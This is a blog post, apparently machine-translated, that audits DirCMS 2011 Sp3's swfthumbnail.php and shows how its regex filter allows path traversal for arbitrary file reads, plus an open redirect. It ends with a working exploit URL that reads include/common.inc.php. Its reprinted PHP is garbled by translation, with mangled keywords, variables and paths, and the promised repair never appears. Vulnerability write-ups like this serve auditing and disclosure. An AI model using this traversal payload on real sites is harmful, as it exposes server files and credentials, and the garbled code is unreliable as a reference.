Arbitrary DirCMS File Reading and repair

It seems that the time has really passed quickly, and the computer is gone after one day. This is not the case, so I plan to take some time to write blogs and learn, and record my own growth.
 
 
Whether it is a programmer or a security engineer, reading other people's code is undoubtedly a fast way to progress, so I think from today I will take the time to read and learn the open-source cms on the webmaster's Internet.
 
When you see a set of DirCms, you will get it back. The name is quite special (ps: Be careful when dir overflows you ).
 
It seems that the black hats audit code is to find keywords and track key locations, and define a list of risky functions and variable names. I am not black and wide, so I like to read files one by one based on the program architecture and learn developer skills at will.
 
When I saw the/api/upload/swfthumbnail. php file, it was completely speechless, with only a few dozen lines of code.
 
As follows:
 
<? Php
 
 
// This script accepts an ID and looks in the user's session for stored thumbnail name.
// It then streams the data to the browser from the file

// Work around the Flash Player Cookie Bug
If (isset ($ _ POST ["PHPSESSID"]) {// This Judgment will not affect the program's downward execution.
Session_id ($ _ POST ["PHPSESSID"]);
}

Session_start ();
 
// Key position. What is the use of this regular expression? Boss can deduct the programmer's funds.
$ Image_id = isset ($ _ GET ["id"])? Preg_replace ('/[^ a-z0-9: \. \/\-]/I', '', $ _ GET [" id "]): false;
 
// Due to the above regular expression problem, $ image_id is true even if it is maliciously constructed
If ($ image_id = false)
{
Header ("HTTP/1.1 500 Internal Server Error ");
Echo "No ID ";
Exit (0 );
}
 
// As long as the id value does not start with http: // and the file exists, it cannot be entered. Because it is to read local files, of course, do not start with http: //, to ensure the existence of files can use the relative path ../../
If (substr ($ image_id, 0, 7 )! = 'HTTP ://'&&! File_exists ("../upload/image/". $ image_id ))
{
Header ("HTTP/1.1 404 Not found ");
Exit (0 );
}
 
// All the above are passed. Of course this is okay.
If (substr ($ image_id, 0, 7 )! = 'HTTP ://')
{
Header ("Content-type: image/jpeg ");
Header ("Content-length:". filesize (".../upload/image/". $ image_id ));
Flush ();
Readfile ("../upload/image/". $ image_id); // output file
 
}
Else
{
Header ('location: '. $ image_id );
}
Exit (0 );
 
 
?>
 
The test version is the latest version: DirCMS 2011 Sp3
 
Exp: view-source:/api/upload/swfthumbnail. php? Id =.../../include/common. inc. php
 
The official website has been notified. do not perform illegal tests. The consequences are irrelevant to yourself.

Author b4dboy